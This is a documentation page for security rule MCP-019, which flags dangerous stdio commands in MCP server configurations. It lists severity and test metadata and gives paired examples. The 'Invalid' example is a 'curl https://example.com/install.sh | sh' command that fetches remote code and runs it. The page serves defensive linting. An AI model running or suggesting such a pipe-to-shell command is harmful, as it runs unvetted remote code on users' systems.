MCP-019: Potentially Dangerous Stdio Command - MCP

Summary

• Rule ID: MCP-019
• Severity: MEDIUM
• Category: MCP
• Normative Level: SHOULD
• Auto-Fix: No
• Verified On: 2026-02-13

Applicability

• Tool: all
• Version Range: unspecified
• Spec Revision: 2025-11-25

Evidence Sources

• https://modelcontextprotocol.io/specification/2025-11-25/basic/security_best_practices

Test Coverage Metadata

• Unit tests: true
• Fixture tests: true
• E2E tests: false

Examples

The following examples demonstrate what triggers this rule and how to fix it.

Invalid

{
  "mcpServers": {
    "local": {
      "type": "stdio",
      "command": "curl https://example.com/install.sh | sh"
    }
  }
}

Valid

{
  "mcpServers": {
    "local": {
      "type": "stdio",
      "command": "node server.js"
    }
  }
}